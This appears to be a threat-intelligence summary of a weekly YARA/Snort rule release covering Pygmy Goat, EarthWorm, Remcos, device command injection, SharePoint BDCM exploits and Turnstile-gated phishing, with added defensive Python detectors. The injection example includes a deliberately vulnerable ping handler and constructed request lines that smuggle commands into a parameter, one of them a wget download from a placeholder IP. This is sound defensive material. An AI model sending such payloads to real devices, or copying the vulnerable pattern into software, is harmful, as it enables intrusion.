Full Report
The following is the information on YARA and Snort rules (week 2, November 2024) collected and shared by the AhnLab TIP service. 3 YARA rules (detection name / description / source): MAL_Sophos_XG_Pygmy_Goat_AES_Key – Detects Pygmy Goat, a native x86-32 ELF shared object that was discovered on Sophos XG firewall devices, providing backdoor access to the device. This […] The post "Weekly Detection Rule (YARA and Snort) Information – Week 2, November 2024" first appeared on ASEC.
Analysis Summary
# Tool/Technique: Pygmy Goat
## Overview
Pygmy Goat is a native x86-32 ELF shared object malware discovered on Sophos XG firewall devices. Its primary purpose is to provide backdoor access, likely for persistent control and command execution on the compromised system.
## Technical Details
- Type: Malware
- Platform: Linux, x86-32 (Sophos XG firewall appliances)
- Capabilities: Provides backdoor access; carries a static AES key and uses fixed magic byte sequences in its C2 protocol, both of which the YARA rules anchor on.
- First Seen: Not stated on this page; the detection rules were published in the week 2, November 2024 batch.
## MITRE ATT&CK Mapping
As this is a backdoor providing remote access, the following mappings are inferred based on its function:
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
- TA0003 - Persistence
- T1543 - Create or Modify System Process (Inferred, often used by persistent backdoors)
## Functionality
### Core Capabilities
- Establishing a persistent backdoor presence on Sophos XG firewalls.
- Utilizing specific static AES keys embedded in the binary for encryption/decryption.
### Advanced Features
- Employs unique magic byte sequences specific to its Command and Control (C2) communications, which are used for detection.
- Built as an ELF shared object rather than a standalone executable, which implies it is loaded into an existing process on the appliance rather than run on its own.
## Indicators of Compromise
- File Hashes: [Not provided in the context data]
- File Names: [Not provided in the context data; the artifact is an ELF shared object (.so)]
- Registry Keys: [Not applicable/Not provided for this Linux-based malware]
- Network Indicators: Communication relies on specific magic byte sequences. [No specific C2 addresses provided]
- Behavioral Indicators: An anomalous SSH banner on the device (Snort rule `ET TROJAN [NCSC] Pygmy Goat SSH Banner`) and an ed25519 key tied to the backdoor (`ET TROJAN [NCSC] Pygmy Goat SSH ed25519 Key`); use of the embedded AES key during C2 communication.
## Associated Threat Actors
- Not named on this page. The same group that deployed Pygmy Goat on Sophos XG firewall devices also used the EarthWorm reverse SOCKS proxy (see the EarthWorm entry below).
## Detection Methods
- Signature-based detection (YARA):
- `MAL_Sophos_XG_Pygmy_Goat_AES_Key`: Detection based on the Pygmy Goat AES key found on the stack or in data sections.
- `MAL_Sophos_XG_Pygmy_Goat_Magic_Strings`: Detection based on magic byte sequences used during C2 communications.
- Snort Rules:
- `ET TROJAN [NCSC] Pygmy Goat SSH Banner`
- `ET TROJAN [NCSC] Pygmy Goat SSH ed25519 Key`
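As an added example (not part of the ASEC post or the NCSC rules), the following Python scanner reproduces the shape of the two Pygmy Goat YARA rules: it first confirms that a file is an x86-32 ELF shared object, the form the malware takes, and only then looks for byte patterns. The real AES key and C2 magic strings are not reproduced on this page, so the `INDICATORS` table holds constructed placeholders that must be replaced with the byte sequences from the published rules; the sample ELF it builds for itself is also constructed and is not loadable.

```python
"""Added example: Pygmy Goat-style file scan in plain Python.
The indicator bytes below are PLACEHOLDERS, not the real key/magic values."""
import struct
from typing import Dict, List, Optional

ELF_MAGIC = b"\x7fELF"
ELFCLASS32, ELFDATA2LSB = 1, 1       # 32-bit, little-endian (x86-32)
ET_EXEC, ET_DYN, EM_386 = 2, 3, 3    # e_type / e_machine values from the ELF spec

# Assumed placeholders standing in for the published indicators.
INDICATORS: Dict[str, bytes] = {
    "pygmy_goat_aes_key_placeholder": bytes(range(0x10, 0x30)),   # 32-byte "key"
    "pygmy_goat_c2_magic_placeholder": b"PGMY\xde\xad\xbe\xef",  # "magic" sequence
}


def parse_elf32_header(data: bytes) -> Optional[Dict[str, int]]:
    """Return e_type/e_machine for a 32-bit little-endian ELF, else None."""
    if len(data) < 52 or data[:4] != ELF_MAGIC:
        return None
    if data[4] != ELFCLASS32 or data[5] != ELFDATA2LSB:
        return None
    # e_type and e_machine are the two halfwords right after the 16-byte e_ident.
    e_type, e_machine = struct.unpack_from("<HH", data, 16)
    return {"type": e_type, "machine": e_machine}


def is_x86_32_shared_object(data: bytes) -> bool:
    """The file-shape half of the rule: ELFCLASS32 + EM_386 + ET_DYN."""
    hdr = parse_elf32_header(data)
    return hdr is not None and hdr["type"] == ET_DYN and hdr["machine"] == EM_386


def scan(data: bytes) -> List[str]:
    """Mirror a YARA condition of the form
    'uint32(0) == 0x464c457f and <x86-32 .so> and any of ($indicators)'.
    Returns the names of the indicators found (empty list = no match)."""
    if not is_x86_32_shared_object(data):
        return []
    return [name for name, pattern in INDICATORS.items() if pattern in data]


def scan_file(path: str) -> List[str]:
    with open(path, "rb") as fh:
        return scan(fh.read())


def build_sample_elf(e_type: int, e_machine: int, payload: bytes) -> bytes:
    """Constructed test input: a bare Elf32_Ehdr followed by payload bytes.
    Enough to exercise the header checks; it is not a loadable object."""
    e_ident = ELF_MAGIC + bytes([ELFCLASS32, ELFDATA2LSB, 1, 0]) + b"\x00" * 8
    rest = struct.pack("<HHIIIIIHHHHHH",
                       e_type, e_machine, 1,        # e_version
                       0, 0, 0, 0,                  # e_entry, e_phoff, e_shoff, e_flags
                       52, 0, 0, 0, 0, 0)           # e_ehsize, ph/sh sizes and counts
    return e_ident + rest + payload


if __name__ == "__main__":
    magic = INDICATORS["pygmy_goat_c2_magic_placeholder"]
    hit = build_sample_elf(ET_DYN, EM_386, b"\x00" * 64 + magic)
    miss = build_sample_elf(ET_EXEC, EM_386, magic)
    print("x86-32 .so with magic :", scan(hit))    # one indicator name
    print("same bytes in ET_EXEC :", scan(miss))   # [] (wrong file shape)
```

The file-shape gate is what keeps such a rule cheap and specific: the same key bytes inside an ET_EXEC or x86-64 object do not fire. Because the rule description mentions the key being found on the stack as well as in data sections, a port of this check should also run over process memory of the appliance, not only over files on disk.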
## Mitigation Strategies
- Patching and securing Sophos XG firewall firmware against exploitation.
- Network segmentation to isolate firewalls.
- Monitoring SSH traffic for unusual banners or key exchanges associated with this malware.
## Related Tools/Techniques
- EarthWorm: A reverse SOCKS proxy used by the same threat group, suggesting the two tools were used together: Pygmy Goat for persistent backdoor access to the firewall and EarthWorm for tunnelling traffic through it.
***
# Tool/Technique: EarthWorm
## Overview
EarthWorm is identified as a reverse SOCKS proxy tool used by the same threat group that deployed Pygmy Goat malware on Sophos XG firewall devices. Its function is to establish tunneled network connections, likely facilitating C2 traffic or lateral movement.
## Technical Details
- Type: Tool / Proxy
- Platform: Deployed on compromised Sophos XG firewall devices (Linux/ELF execution environment, as for Pygmy Goat).
- Capabilities: Functions as a reverse SOCKS proxy: the compromised host connects out to the attacker, who then relays SOCKS traffic back through it into the victim network. The YARA rule anchors on the x86 instruction sequence of its pool-number (proxy ID) generation routine.
- First Seen: Information not explicitly provided.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
## Functionality
### Core Capabilities
- Establishing a reverse SOCKS proxy connection from the compromised target back to the attacker.
### Advanced Features
- Its pool-number (proxy ID) generation routine compiles to a distinctive x86 instruction sequence, which is what the YARA rule anchors on.
## Indicators of Compromise
- File Hashes: [Not provided]
- File Names: [Not provided]
- Registry Keys: [Not applicable/Not provided]
- Network Indicators: Proxy traffic patterns. [No specific C2 addresses provided]
- Behavioral Indicators: On disk, a binary matching `MAL_EarthWorm_Socks_Proxy_ID_Generation`; on the wire, a SOCKS5 handshake carried on a connection that the firewall itself initiated outbound (the expected shape of a reverse SOCKS proxy, not a signature published on this page).
## Associated Threat Actors
- The threat group that deployed Pygmy Goat malware on Sophos XG firewall devices.
## Detection Methods
- Signature-based detection (YARA):
- `MAL_EarthWorm_Socks_Proxy_ID_Generation`: Detection based on the x86 assembly pattern used for pool num generation.
## Mitigation Strategies
- Network monitoring for unexpected outbound SOCKS proxy connections originating from network infrastructure devices.
- Hardening and patching the firewall against the initial access vector (not described on this page) used to deploy EarthWorm and Pygmy Goat.
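The first mitigation above (watch for SOCKS from infrastructure devices) has a subtlety worth showing: with a reverse SOCKS proxy the firewall is the TCP client, but the SOCKS greeting arrives from the remote end. The following added example (mine, not code from the ASEC post or from EarthWorm) parses the SOCKS5 handshake per RFC 1928 and flags flows from an assumed firewall management address in which either direction carries it, labelling the reverse case separately; the flow records and the `INFRA_DEVICES` address are constructed.

```python
"""Added example: spotting a reverse SOCKS5 proxy in connection metadata.
Flow records and the INFRA_DEVICES address are constructed for illustration."""
import ipaddress
import struct
from typing import Dict, List, Optional

INFRA_DEVICES = {"10.0.0.1"}  # assumed firewall management address (constructed)


def parse_socks5_greeting(b: bytes) -> Optional[List[int]]:
    """Client greeting (RFC 1928 s.3): VER=5, NMETHODS, METHODS[NMETHODS]."""
    if len(b) < 2 or b[0] != 5:
        return None
    n = b[1]
    if n == 0 or len(b) < 2 + n:
        return None
    return list(b[2:2 + n])


def parse_socks5_request(b: bytes) -> Optional[Dict[str, object]]:
    """Client request (RFC 1928 s.4): VER=5, CMD, RSV=0, ATYP, DST.ADDR, DST.PORT."""
    if len(b) < 4 or b[0] != 5 or b[1] not in (1, 2, 3) or b[2] != 0:
        return None
    atyp = b[3]
    if atyp == 1 and len(b) >= 8:                                # IPv4
        addr, off = str(ipaddress.IPv4Address(b[4:8])), 8
    elif atyp == 3 and len(b) >= 5 and len(b) >= 5 + b[4]:      # domain name
        addr, off = b[5:5 + b[4]].decode("ascii", "replace"), 5 + b[4]
    elif atyp == 4 and len(b) >= 20:                             # IPv6
        addr, off = str(ipaddress.IPv6Address(b[4:20])), 20
    else:
        return None
    if len(b) < off + 2:
        return None
    return {"cmd": b[1], "addr": addr, "port": struct.unpack("!H", b[off:off + 2])[0]}


def socks5_role(payload: bytes) -> Optional[str]:
    """Classify the first bytes seen in one direction of a flow.
    The request is checked first because a greeting ('05 01 00') is a
    prefix of a request that starts the same way."""
    if parse_socks5_request(payload) is not None:
        return "request"
    if parse_socks5_greeting(payload) is not None:
        return "greeting"
    if len(payload) == 2 and payload[0] == 5 and payload[1] in (0, 1, 2, 0xFF):
        return "method-selection"           # reply to the greeting
    return None


def detect_reverse_socks(flows: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Alert on flows from infrastructure devices carrying SOCKS5.
    'reverse' = the greeting came from the server side, i.e. the device
    connected out and the remote end is using it as a proxy."""
    alerts = []
    for f in flows:
        if f["src"] not in INFRA_DEVICES:
            continue
        c_role = socks5_role(f["client_first"])
        s_role = socks5_role(f["server_first"])
        if c_role is None and s_role is None:
            continue
        pattern = "reverse" if s_role == "greeting" else "forward"
        alerts.append({"src": f["src"], "dst": f"{f['dst']}:{f['dport']}",
                       "pattern": pattern, "client": c_role, "server": s_role})
    return alerts


# Constructed flows: first bytes sent by each side after the TCP handshake.
SAMPLE_FLOWS = [
    # firewall -> attacker:443; attacker sends the greeting, firewall answers
    {"src": "10.0.0.1", "dst": "203.0.113.7", "dport": 443,
     "client_first": b"\x05\x00", "server_first": b"\x05\x01\x00"},
    # firewall -> update server: TLS ClientHello / ServerHello, benign
    {"src": "10.0.0.1", "dst": "203.0.113.9", "dport": 443,
     "client_first": b"\x16\x03\x01\x00\xc8\x01", "server_first": b"\x16\x03\x03\x00\x5a\x02"},
    # workstation using an ordinary forward SOCKS proxy: not an infra device
    {"src": "10.0.0.50", "dst": "198.51.100.2", "dport": 1080,
     "client_first": b"\x05\x01\x00", "server_first": b"\x05\x00"},
]

if __name__ == "__main__":
    for a in detect_reverse_socks(SAMPLE_FLOWS):
        print(a)   # one alert: 10.0.0.1 -> 203.0.113.7:443, pattern 'reverse'
```

A leading 0x05 byte is rare in other plaintext protocols but not impossible, so treat a match as a lead rather than a verdict; the reverse pattern on port 443 from a device that should only ever speak TLS outbound is the combination worth paging on.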
## Related Tools/Techniques
- Pygmy Goat: Malware often deployed by the same actor in conjunction with EarthWorm.
***
# Tool/Technique: Remcos Payload M2 Traffic
## Overview
This entry refers to network traffic indicative of communication with a known Command and Control (C2) infrastructure associated with the Remcos Remote Access Trojan (RAT).
## Technical Details
- Type: Malware/Network Pattern
- Platform: Unknown (Inferred to be Windows given Remcos' typical profile, but the detection is network-based)
- Capabilities: A match indicates a host fetching a Remcos payload stage over HTTP, i.e., an infection in progress or an already active Remcos session.
- First Seen: November 2024 observation window.
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1071 - Application Layer Protocol
## Functionality
### Core Capabilities
- Signatures detect HTTP requests specifically targeting a known C2 stage for the Remcos RAT payload.
## Indicators of Compromise
- Network Indicators: HTTP Requests matching known Remcos C2 patterns (`ET TROJAN HTTP Request to Remcos Payload M2`).
## Associated Threat Actors
- Actors utilizing the Remcos RAT.
## Detection Methods
- Snort Rules:
- `ET TROJAN HTTP Request to Remcos Payload M2`
## Mitigation Strategies
- Blocking access to known Remcos C2 domains/IPs (if listed in a complete IOC feed).
- Endpoint detection and response capable of identifying Remcos installation or execution.
## Related Tools/Techniques
- Remcos RAT.
***
# Technique: Command Injection (Various Vendor Devices)
## Overview
Several Snort rules indicate detection of command injection attempts targeting a variety of network hardware and vendor applications, signifying common exploitation techniques being actively monitored.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Primarily consumer and SOHO network devices (D-Link NAS and access points, Tenda routers, APsystems ECU-R, PTZOptics cameras); the Microsoft SharePoint rules from the same batch are covered in their own entry below.
- Capabilities: Successful injection allows for arbitrary command execution on the target device/application, typically with the privileges of the device's web server process (often root on embedded devices).
- First Seen: Not a single date; the covered CVEs span 2019 to 2024.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell (the injected payload is run by the device's shell)
## Functionality
### Core Capabilities
- Exploiting user-controlled fields of the device's web interface (e.g., the target address handled by `ping.ccp`, the user name passed to `cgi_user_add`) that are concatenated into a shell command without validation, so that attacker-supplied shell metacharacters and commands are executed.
## Indicators of Compromise
- Network Indicators: Specific command strings or payloads indicative of injection attempts targeting vulnerable services.
## Associated Threat Actors
- Generic activity, often associated with automated scanning or exploit campaigns targeting known CVEs.
## Detection Methods
- Snort Rules focusing on specific CVEs:
- **D-Link:** CVE-2024-10914 (NAS OS), CVE-2019-20499/20500/20501 (DWL-2600AP)
- **Tenda:** CVE-2023-27240 (AX3), CVE-2022-30023 (HG9 Router)
- **APsystems:** CVE-2022-45699 (ECU-R)
- **PTZOptics:** CVE-2024-8956 (Authentication Bypass, leading to potential injection/access)
## Mitigation Strategies
- Immediate patching of affected devices (D-Link, Tenda, APsystems, PTZOptics).
- Input validation on all device management interfaces.
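As an added example (not from the ASEC post or any of the vendors' firmware), the following Python shows the defect class behind these rules and both sides of the fix: a `ping`-style handler that splices a request parameter into a shell command line, the same handler with allowlist validation and an argv list instead of a shell, and a small request-line checker in the spirit of the Snort rules that flags shell metacharacters in parameters sent to `ping.ccp`- and `cgi_user_add`-style endpoints. The request lines and endpoint paths are constructed, and the handlers return the command they would run rather than executing it.

```python
"""Added example: OS command injection in a device web handler, its hardened
form, and a request-line detector. All inputs are constructed."""
import ipaddress
import re
from typing import List
from urllib.parse import unquote_plus, urlsplit


# --- the defect ----------------------------------------------------------
def ping_handler_vulnerable(host: str) -> str:
    """VULNERABLE: builds a shell command line by string concatenation.
    Returns the line that would be handed to os.system()/popen()."""
    return "ping -c 1 " + host


# --- the fix -------------------------------------------------------------
_HOSTNAME = re.compile(r"[A-Za-z0-9](?:[A-Za-z0-9.-]{0,252})")   # no leading '-'


def ping_handler_hardened(host: str) -> List[str]:
    """Allowlist-validate the argument and return an argv list; with a list
    there is no shell, so metacharacters cannot change the command."""
    try:
        ipaddress.ip_address(host)           # literal IPv4/IPv6 is fine
    except ValueError:
        if not _HOSTNAME.fullmatch(host):
            raise ValueError("rejected host argument: %r" % host)
    return ["ping", "-c", "1", host]         # run with subprocess.run(argv)


def hardened_accepts(host: str) -> bool:
    try:
        ping_handler_hardened(host)
        return True
    except ValueError:
        return False


# --- the detection -------------------------------------------------------
WATCHED_ENDPOINTS = ("ping.ccp", "cgi_user_add")      # endpoint names from the rules
SHELL_META = re.compile(r"[;|&`$()<>\n\r]")          # characters a shell interprets


def detect_injection(request_line: str) -> List[str]:
    """Return findings for an HTTP request line whose query parameters to a
    watched endpoint (matched on the path or on a parameter value such as
    cmd=cgi_user_add) contain shell metacharacters."""
    try:
        _method, target, _version = request_line.split(" ", 2)
    except ValueError:
        return []
    parts = urlsplit(target)
    pairs = []
    # Split on '&' only: a ';' inside a value is exactly what we want to see.
    for pair in parts.query.split("&"):
        if "=" in pair:
            key, value = pair.split("=", 1)
            pairs.append((key, unquote_plus(value)))
    watched = any(parts.path.endswith(n) for n in WATCHED_ENDPOINTS) or \
        any(v in WATCHED_ENDPOINTS for _k, v in pairs)
    if not watched:
        return []
    return [f"{parts.path}: parameter {k!r} = {v!r}"
            for k, v in pairs if SHELL_META.search(v)]


# Constructed request lines (not real captures).
SAMPLE_REQUESTS = [
    "GET /ping.ccp?ping_addr=192.0.2.10 HTTP/1.1",
    "GET /ping.ccp?ping_addr=192.0.2.10;wget+http://198.51.100.5/x+-O+/tmp/x HTTP/1.1",
    "GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;id;%27&group=users HTTP/1.1",
    "GET /index.html?q=a;b HTTP/1.1",
]

if __name__ == "__main__":
    print(ping_handler_vulnerable("192.0.2.10;id"))   # ping -c 1 192.0.2.10;id
    print(hardened_accepts("192.0.2.10;id"))          # False
    for line in SAMPLE_REQUESTS:
        print(line, "->", detect_injection(line))
```

The hardened handler rejects rather than sanitises: stripping metacharacters leaves room for encodings the filter did not anticipate, whereas an allowlist plus an argv list removes the shell from the path entirely. The detector is deliberately narrow (watched endpoints only) so it can run inline; a broader version should also look at POST bodies, which is where several of the listed CVEs carry their payload.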
## Related Tools/Techniques
- Other web application exploitation techniques.
***
# Technique: Microsoft SharePoint Vulnerability Exploitation (CVE-2023-24955, CVE-2024-38094)
## Overview
Detection rules specifically target exploitation attempts against Microsoft SharePoint related to two different high-profile vulnerabilities, focusing on the creation and execution of BDCM files.
## Technical Details
- Type: Technique (Vulnerability Exploitation)
- Platform: Microsoft SharePoint Server
- Capabilities: Successful exploitation allows an attacker to create and execute malicious BDCM (Business Data Connectivity Model) files, leading to code execution on the SharePoint server.
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1190 - Exploit Public-Facing Application
- TA0002 - Execution (server-side code execution following the BDCM file creation)
## Functionality
### Core Capabilities
- Attempting to leverage flaws in how SharePoint processes BDCM files to execute arbitrary code.
## Indicators of Compromise
- Network Indicators: Traffic patterns associated with the upload/creation and subsequent execution trigger of malicious BDCM files.
## Associated Threat Actors
- Threat actors targeting vulnerable SharePoint instances.
## Detection Methods
- Snort Rules:
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM File Creation (CVE-2023-24955)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM Execution (CVE-2023-24955)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM File Creation (CVE-2024-38094)`
- `ET WEB_SPECIFIC_APPS Microsoft Sharepoint BDCM Execution (CVE-2024-38094)`
## Mitigation Strategies
- Applying relevant Microsoft security updates for CVE-2023-24955 and CVE-2024-38094.
## Related Tools/Techniques
- File Upload vulnerabilities.
***
# Technique: Credential Phishing Landing Pages
## Overview
Multiple rules track network traffic associated with credential harvesting pages, specifically mentioning campaigns tracked as "DadSec" and "MAMBA," and methods involving Cloudflare Turnstile rendering.
## Technical Details
- Type: Technique (Phishing/Credential Access)
- Platform: Web traffic
- Capabilities: Directing users to imitation login pages to harvest credentials. Several rules key on how the pages render Cloudflare Turnstile, the bot-verification widget that phishing kits place in front of the credential form so that automated URL scanners and sandboxes do not reach it.
## MITRE ATT&CK Mapping
- TA0006 - Credential Access
- T1566 - Phishing
## Functionality
### Core Capabilities
- Hosting look-alike login pages that capture submitted credentials; the rules name two tracked phishing kits/campaigns, DadSec and MAMBA.
## Indicators of Compromise
- Network Indicators: Traffic flows matching redirects or access patterns to known phishing domains, especially those involving specific Cloudflare Turnstile rendering techniques observed on specific dates (e.g., 2024-11-05, 2024-11-07, 2024-11-08).
## Associated Threat Actors
- DadSec and MAMBA related campaigns (General phishing operations).
## Detection Methods
- Snort Rules:
- Rules tracking Google redirect behavior.
- Rules tracking DadSec and MAMBA-named landing pages.
- Rules differentiating between generic phishing pages and those using explicit/implicit Cloudflare Turnstile rendering.
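As an added example (mine, not from the ASEC post or the ET rule set), the following Python classifies a fetched page along the explicit/implicit distinction above: explicit rendering loads Turnstile's `api.js` with `render=explicit` and calls `turnstile.render(...)` from script, while implicit rendering drops a `<div class="cf-turnstile">` into the markup. It also records whether the page carries a password field and whether its form posts off-origin, two traits a credential-harvesting landing page usually has. The exact markers the ET rules match on are not published on this page, so treating these as the rules' logic is an assumption; the HTML samples and the `login-portal.example` host are constructed.

```python
"""Added example: classify how a page renders Cloudflare Turnstile and whether
it looks like a credential form. HTML samples are constructed."""
from html.parser import HTMLParser
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

TURNSTILE_HOST = "challenges.cloudflare.com"
TURNSTILE_PATH = "/turnstile/v0/api.js"


class PageFeatures(HTMLParser):
    """Collect the handful of markup features the classifier needs."""

    def __init__(self) -> None:
        super().__init__()
        self.turnstile_script = False        # api.js loaded at all
        self.explicit_param = False          # api.js?render=explicit
        self.implicit_widget = False         # <div class="cf-turnstile">
        self.password_field = False
        self.form_actions: List[str] = []
        self.script_text: List[str] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "script":
            self._in_script = True
            u = urlsplit(a.get("src", ""))
            if u.netloc == TURNSTILE_HOST and u.path == TURNSTILE_PATH:
                self.turnstile_script = True
                if parse_qs(u.query).get("render") == ["explicit"]:
                    self.explicit_param = True
        elif tag == "div" and "cf-turnstile" in a.get("class", "").split():
            self.implicit_widget = True
        elif tag == "input" and a.get("type", "").lower() == "password":
            self.password_field = True
        elif tag == "form":
            self.form_actions.append(a.get("action", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self.script_text.append(data)


def classify(html: str, page_host: str) -> Dict[str, object]:
    """Return the Turnstile rendering mode plus credential-form traits."""
    p = PageFeatures()
    p.feed(html)
    js = "".join(p.script_text)
    explicit = p.turnstile_script and (p.explicit_param or "turnstile.render(" in js)
    implicit = p.turnstile_script and p.implicit_widget and not explicit
    rendering = "explicit" if explicit else "implicit" if implicit else "none"
    off_origin = [a for a in p.form_actions if urlsplit(a).netloc not in ("", page_host)]
    return {
        "turnstile": rendering,
        "password_field": p.password_field,
        "posts_off_origin": bool(off_origin),
        # Shape of a gated credential page; corroborate (domain age, brand in
        # title vs. host) before calling it phishing, since real sites use Turnstile too.
        "credential_form_behind_turnstile": p.password_field and rendering != "none",
    }


# Constructed pages (not real phishing kit output).
SAMPLE_EXPLICIT = """<html><head>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=cb&amp;render=explicit" async defer></script>
<script>function cb(){turnstile.render('#gate',{sitekey:'0xSITEKEY',callback:unlock});}</script>
</head><body><div id="gate"></div>
<form action="https://collector.example/post" method="post">
<input name="user"><input name="pass" type="password"></form></body></html>"""

SAMPLE_IMPLICIT = """<html><head>
<script src="https://challenges.cloudflare.com/turnstile/v0/api.js" async defer></script>
</head><body><form action="/login" method="post">
<div class="cf-turnstile" data-sitekey="0xSITEKEY"></div>
<input name="user"><input name="pass" type="password"></form></body></html>"""

SAMPLE_PLAIN = """<html><body><form action="/login" method="post">
<input name="user"><input name="pass" type="password"></form></body></html>"""

if __name__ == "__main__":
    for name, page in (("explicit", SAMPLE_EXPLICIT), ("implicit", SAMPLE_IMPLICIT), ("plain", SAMPLE_PLAIN)):
        print(name, classify(page, "login-portal.example"))
```

Note that the classifier only sees what the HTTP response body contains; kits that inject the form after the Turnstile callback fires will show the gate but not the password field on the first fetch, which is exactly the evasion the widget is there to provide, so pair this with a headless fetch that completes the challenge when a second pass is warranted.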
## Mitigation Strategies
- User security awareness training regarding suspicious links and credential entry.
- Network filtering or DNS blacklisting for known phishing domains.